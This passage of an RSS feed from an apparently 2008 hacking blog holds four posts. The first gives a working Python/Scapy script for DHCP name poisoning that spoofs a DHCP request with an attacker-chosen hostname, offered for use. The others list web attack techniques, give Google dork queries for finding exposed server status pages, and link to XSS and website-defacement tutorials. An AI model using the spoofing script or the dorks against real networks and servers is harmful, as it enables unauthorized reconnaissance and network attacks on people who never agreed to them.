		<description><![CDATA[if yesterday i&#8217;ve post one issue that present at WHITEHAT 2008 junction at dubai this is the reverse one, this is one issue that BLACKHAT junction at amsterdam 2008, there are  some thing  different  if you read  both  of the  slide  from WHITEHAT and BLACKHAT the first is [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">if yesterday i&#8217;ve <a title="hacking technique" href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" target="_blank">post one issue</a> that present at WHITEHAT 2008 junction at dubai this is the reverse one, this is one issue that BLACKHAT junction at amsterdam 2008, there are  some thing  different  if you read  both  of the  slide  from WHITEHAT and BLACKHAT the first is talking about fact on vulnerable,hacking attack possibility and of course how to prevent it.the second one not talking to much, it just show code and the latest exploit that we can use, this is one of code that i get at the slideshow.this one abotu DHCP name poisoning attack , i&#8217;ll just post the code here <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p style="text-align: justify;"><span id="more-144"></span></p>
<blockquote>
<p style="text-align: justify;">#!/usr/bin/env python</p>
<p>from scapy import *<br />
def usage():<br />
print &#8220;Usage: DHCPspoof &lt;ip&gt; &lt;name&gt;“<br />
sys.exit(1)<br />
if len(sys.argv) != 3:<br />
usage()<br />
requested_ip = sys.argv[1]<br />
requested_name = sys.argv[2]<br />
interface = conf.route.route(requested_ip)[0]<br />
localmac = get_if_hwaddr(interface)<br />
localip = get_if_addr(interface)<br />
print(&#8221;Sending DHCPREQUEST&#8221;)<br />
ether = Ether(src=&#8221;00:00:00:00:00:00&#8243;, dst=&#8221;ff:ff:ff:ff:ff:ff&#8221;)<br />
ip = IP(src=&#8221;0.0.0.0&#8243;, dst=&#8221;255.255.255.255&#8243;)<br />
udp = UDP(sport=68, dport=67)<br />
bootp = BOOTP(chaddr=localmac, xid=0&#215;11033000)<br />
dhcpOptions = DHCP(options=[(&#8217;message-type&#8217;, &#8216;request&#8217;), (&#8217;hostname&#8217;, requested_name),<br />
(&#8217;requested_addr&#8217;, requested_ip), (&#8217;end&#8217;)])<br />
packet = ether/ip/udp/bootp/dhcpOptions<br />
sendp(packet)</p>
<p style="text-align: justify;">
</blockquote>
<p>this coded using python by Jason Macpherson. enjoy !</p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/news/exploit-me-sql-inject-me-xss-me-plugin.box" rel="bookmark" title="Permanent Link: addons for Hacker : Sql Inject-me and Xss-me Plugin" >addons for Hacker : Sql Inject-me and Xss-me Plugin</a></span><div class="aizattos_related_posts_excerpt">Security Compass announces the release of the open source addons mozilla firefox for web application...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/vulnerability/hacking-adobe-photoshop-cs2-cs3-file-buffer-overflow.box" rel="bookmark" title="Permanent Link: Adobe Photoshop CS2 / CS3 File Buffer Overflow" >Adobe Photoshop CS2 / CS3 File Buffer Overflow</a></span><div class="aizattos_related_posts_excerpt">
 A “highly-critical” security flaw in Adobe Photoshop CS2 and CS3 that could allow remote hack...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" rel="bookmark" title="Permanent Link: Newest Web Hacking Techniques" >Newest Web Hacking Techniques</a></span><div class="aizattos_related_posts_excerpt">wow,this must be good isn't it? this listed by Jeremiah Grossman,Founder &amp; CTO WhiteHat Security...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/step-step-hacking-website.box" rel="bookmark" title="Permanent Link: Step By Step Hacking a Website" >Step By Step Hacking a Website</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/scripts/dhcp-name-poisoning-attacks.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>Newest Web Hacking Techniques</title>
		<link>http://backtrackbox.com/learn/newest-web-hacking-techniques.box</link>
		<comments>http://backtrackbox.com/learn/newest-web-hacking-techniques.box#comments</comments>
		<pubDate>Fri, 09 May 2008 10:17:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[learn]]></category>

		<category><![CDATA[news]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[vulnerability news]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=139</guid>
		<description><![CDATA[wow,this must be good isn&#8217;t it? this listed by Jeremiah Grossman,Founder &#38; CTO WhiteHat Security on a persentation at Dubai 17thMay2008, i wont list it here, because it a huge list, and picture below is show
the Likelihood that a website has a vulnerability, by Class :


and this little list from the latest web vulnerability
The Attack [...]]]></description>
			<content:encoded><![CDATA[<p>wow,this must be good isn&#8217;t it? this listed by Jeremiah Grossman,Founder &amp; CTO WhiteHat Security on a persentation at Dubai 17thMay2008, i wont list it here, because it a huge list, and picture below is show<br />
the Likelihood that a website has a vulnerability, by Class :</p>
<p style="text-align: center;"><img src="http://backtrackbox.com/wp-content/uploads/2008/05/latest-web-vulnerability-300x187.jpg" alt="latest web vulnerability" width="465" height="334" /></p>
<p><span id="more-139"></span></p>
<p>and this little list from the latest web vulnerability</p>
<p>The Attack of the TINY URLs<br />
CSS History Stealing Acts As Cookie<br />
Backdooring MP3 Files<br />
Detecting FireFox Extensions<br />
Backdooring QuickTime Movies<br />
Stealing User Information Via Automatic Form Filling<br />
CSS history hacking with evil marketing<br />
Circumventing DNS Pinning for XSS<br />
I know where you&#8217;ve been<br />
Netflix.com XSRF vuln<br />
Stealing Search Engine Queries with JavaScript<br />
Browser Port Scanning without JavaScript<br />
Hacking RSS Feeds<br />
Widespread XSS for Google Search Appliance<br />
MX Injection : Capturing and Exploiting Hidden Mail Servers Bypassing Filters With Encoding<br />
Blind web server fingerprinting<br />
Variable Width Encoding<br />
JavaScript Port Scanning<br />
Network Scanning with HTTP without JavaScript<br />
CSRF with MS Word<br />
AT&amp;T Hack Highlights Web Site Vulnerabilities<br />
Backdooring PDF Files<br />
How to get linked from Slashdot<br />
Exponential XSS Attacks<br />
F5 and Acunetix XSS disclosure<br />
Malformed URL in Image Tag Fingerprints Internet Explorer<br />
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning<br />
JavaScript Portscanning and bypassing HTTP Auth<br />
Google plugs phishing hole<br />
Bruteforcing HTTP Auth in Firefox with JavaScript</p>
<p>and here is the full list <a title="latest website vulnerability list" href="http://backtrackbox.com/wp-content/uploads/2008/05/latest-web-vulnerability.txt" target="_blank">latest website vulnerability</a></p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/scripts/dhcp-name-poisoning-attacks.box" rel="bookmark" title="Permanent Link: DHCP name poisoning attacks" >DHCP name poisoning attacks</a></span><div class="aizattos_related_posts_excerpt">if yesterday i've post one issue that present at WHITEHAT 2008 junction at dubai this is the reverse...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-website/lastest-wordpress-vulnerability.box" rel="bookmark" title="Permanent Link: Latest Wordpress Vulnerability" >Latest Wordpress Vulnerability</a></span><div class="aizattos_related_posts_excerpt">highly critical issue i found several day ago that wordpress 2.3.3 has  vulnerability.and it has pos...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/news/exploit-me-sql-inject-me-xss-me-plugin.box" rel="bookmark" title="Permanent Link: addons for Hacker : Sql Inject-me and Xss-me Plugin" >addons for Hacker : Sql Inject-me and Xss-me Plugin</a></span><div class="aizattos_related_posts_excerpt">Security Compass announces the release of the open source addons mozilla firefox for web application...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/news/owasp-webgoat-project-help-you-how-to-became-great-hacker.box" rel="bookmark" title="Permanent Link: OWASP WebGoat Project help you how to  become Great Hacker" >OWASP WebGoat Project help you how to  become Great Hacker</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/google-hack/inurlserver-info-apache-server-information.box" rel="bookmark" title="Permanent Link: inurl:server-info &#8220;Apache Server Information&#8221;" >inurl:server-info &#8220;Apache Server Information&#8221;</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/learn/newest-web-hacking-techniques.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>inurl:server-info &#8220;Apache Server Information&#8221;</title>
		<link>http://backtrackbox.com/google-hack/inurlserver-info-apache-server-information.box</link>
		<comments>http://backtrackbox.com/google-hack/inurlserver-info-apache-server-information.box#comments</comments>
		<pubDate>Thu, 08 May 2008 12:03:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Google Hack]]></category>

		<category><![CDATA[google dork]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=138</guid>
		<description><![CDATA[i&#8217;m really busy this several day and may be it will keep like this until next month, and i&#8217;m sorry i can&#8217;t post daily like usual  coz this thing make me really busy and take all my concentrate, but of course i&#8217;ll keep post at this site, may be 2 day per post or if [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">i&#8217;m really busy this several day and may be it will keep like this until next month, and i&#8217;m sorry i can&#8217;t post daily like usual  coz this thing make me really busy and take all my concentrate, but of course i&#8217;ll keep post at this site, may be 2 day per post or if i have time i&#8217;ll post daily again, on this post i&#8217;d like to post some google dork to do information gathering on the net, on some server, this will be contain juicy information just try one by one and if you interested do stop just using dork i give , be more creative, explore guys ! this is list of google dork or Querying for application-generated system reports</p>
<p style="text-align: justify;"><span id="more-138"></span></p>
<p style="text-align: left;"><strong>&#8220;Generated by phpSystem&#8221; </strong> :  operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points<br />
<strong>&#8220;This summary was generated by wwwstat&#8221;</strong> :     web server statistics, system file structure<br />
<strong>&#8220;These statistics were produced by getstats&#8221;</strong> :        web server statistics, system file structure<br />
<strong>&#8220;This report was generated by WebLog&#8221;</strong> :       web server statistics, system file structure<br />
<strong>intext:&#8221;Tobias Oetiker&#8221; &#8220;traffic analysis&#8221;</strong> :  system performance statistics as MRTG charts, network       configuration</p>
<p style="text-align: left;"><strong>intitle:&#8221;Apache::Status&#8221; (inurl:server-status | inurl: status.html | inurl:apache.html)</strong> : server version, operating system type, child process list,current connections</p>
<p style="text-align: left;"><strong>intitle:&#8221;ASP Stats Generator *.*&#8221; &#8220;ASP Stats  Generator&#8221; &#8220;2003-2004 weppos&#8221;</strong> :    web server activity, lots of visitor information</p>
<p><strong>intitle:&#8221;Multimon UPS status page&#8221; </strong> :              UPS device performance statistics<br />
intitle:&#8221;<strong>statistics of&#8221; &#8220;advanced web statistics&#8221; </strong> :  web server statistics, visitor information<br />
<strong>intitle:&#8221;System Statistics&#8221; +&#8221;System and Network Information Center&#8221; </strong> :  system performance statistics as MRTG charts, hardware configuration, running services</p>
<p style="text-align: left;">
<strong>intitle:&#8221;Usage Statistics for&#8221; &#8220;Generated by Webalizer&#8221; </strong> : web server statistics, visitor information, system file   structure<br />
<strong>intitle:&#8221;Web Server Statistics for ****&#8221; </strong> :      web server statistics, visitor information<br />
<strong>inurl:&#8221;/axs/ax-admin.pl&#8221; -script </strong> :             web server statistics, visitor information<br />
<strong>inurl:&#8221;/cricket/grapher.cgi&#8221; </strong> :                MRTG charts of network interface performance<br />
<strong>inurl:server-info &#8220;Apache Server Information&#8221; </strong> :        web server version and configuration, operating system<br />
type, system file structure<br />
<strong>&#8220;Output produced by SysWatch *&#8221; </strong> : operating system type and version, logged users, free                       memory and disk space, mount points, running processes, system logs</p>
<p style="text-align: left;">it little messed up, but i think you can read it,, enjoy!</p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/google-hack/intitleindexof-passwd.box" rel="bookmark" title="Permanent Link: intitle:index.of passwd" >intitle:index.of passwd</a></span><div class="aizattos_related_posts_excerpt">intitle:index.of passwd
intitle:"Index.of..etc" passwd
intitle:index.of pwd.db passwd
intitle:ind...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/how-to-make-squid-password-authentication.box" rel="bookmark" title="Permanent Link: How To Make Squid-Password Authentication" >How To Make Squid-Password Authentication</a></span><div class="aizattos_related_posts_excerpt">after getting a hacked proxy server and manage it into a round-robin server. so this one is how to m...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/bypass-campus-bandwidth-shaper-2.box" rel="bookmark" title="Permanent Link: Bypass Campus Bandwidth Shaper #2" >Bypass Campus Bandwidth Shaper #2</a></span><div class="aizattos_related_posts_excerpt">after finding a server using technique on my previous article , assuming that you already have a rem...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/rooting-phpmyadmin-with-google-dork-and-spawn-a-shell-repost.box" rel="bookmark" title="Permanent Link: Rooting PHPMyadmin with Google Dork and Spawn a Shell [Repost]" >Rooting PHPMyadmin with Google Dork and Spawn a Shell [Repost]</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/google-hack/password-stealing-using-google-dork.box" rel="bookmark" title="Permanent Link: Password Stealing using Google dork" >Password Stealing using Google dork</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/google-hack/inurlserver-info-apache-server-information.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>Xss Walkthrough</title>
		<link>http://backtrackbox.com/video-hacking/xss-walkthrough.box</link>
		<comments>http://backtrackbox.com/video-hacking/xss-walkthrough.box#comments</comments>
		<pubDate>Tue, 06 May 2008 12:58:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Hacking Website]]></category>

		<category><![CDATA[Video Hacking]]></category>

		<category><![CDATA[cross site scripting]]></category>

		<category><![CDATA[tutorial]]></category>

		<category><![CDATA[css]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=133</guid>
		<description><![CDATA[like i&#8217;ve posted at my previous articles that the XSS era has come, sql injection , rfi and lfi is so last year , now is the xss time! so i decide to do xss walkthrough just want to give us more information about xss. i&#8217;ve read all xss articles at xssed.com but i thing [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">like i&#8217;ve posted at my previous articles that the XSS era has come, sql injection , rfi and lfi is so last year , now is the xss time! so i decide to do xss walkthrough just want to give us more information about xss. i&#8217;ve read all xss articles at xssed.com but i thing very good guide is this one, i got this from milw0rm.com wrote by t0pP8uZz.here is some link to get more information about xss and how to xss</p>
<p style="text-align: justify;"><span id="more-133"></span></p>
<p>http://milw0rm.com/papers/173</p>
<p>wrote by t0pP8uZz a complete walkthrough about xss, telling about the very basic about xss , deface method , cookie stealing, filteration bypassingm, advance xss and of course how to securing xss.</p>
<p>http://xssed.com/articleslist</p>
<p>complete literatur for xss technique you can find here, all you need provide here, from articles and xssed site, they updated the xssed database every day, maybe this is the largest directory that talking about xss.</p>
<p>the articles link is here</p>
<p>http://xssed.com/articleslist</p>
<p>and the last is video tutorial how to deface a website, here is the link, get it from sla.ckers.org , taken an example defaceing Horde Webmail. enjoy!<span style="color: silver;"><br />
</span></p>
<p>http://rapidshare.com/files/22726382/Horde_xss_defacement.avi.html</p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-website/xss-is-now.box" rel="bookmark" title="Permanent Link: XSS is now!" >XSS is now!</a></span><div class="aizattos_related_posts_excerpt">
Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based ...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/step-step-hacking-website-xss-cookie-stealer-technique.box" rel="bookmark" title="Permanent Link: Step by Step Hacking Website : XSS - Cookie Stealer Technique" >Step by Step Hacking Website : XSS - Cookie Stealer Technique</a></span><div class="aizattos_related_posts_excerpt">
First technique about SQL Injection Penetration Test is done, and now we'll discuss about XSS, XSS...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/find-xss-vulnerable-sites.box" rel="bookmark" title="Permanent Link: Find Xss Vulnerable Sites" >Find Xss Vulnerable Sites</a></span><div class="aizattos_related_posts_excerpt">i wont tell like "first look find technique", this some kind trying your luck, i think this is the m...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/news/exploit-me-sql-inject-me-xss-me-plugin.box" rel="bookmark" title="Permanent Link: addons for Hacker : Sql Inject-me and Xss-me Plugin" >addons for Hacker : Sql Inject-me and Xss-me Plugin</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" rel="bookmark" title="Permanent Link: Newest Web Hacking Techniques" >Newest Web Hacking Techniques</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/video-hacking/xss-walkthrough.box/feed</wfw:commentRss>
		</item>
	</channel>
</rss>
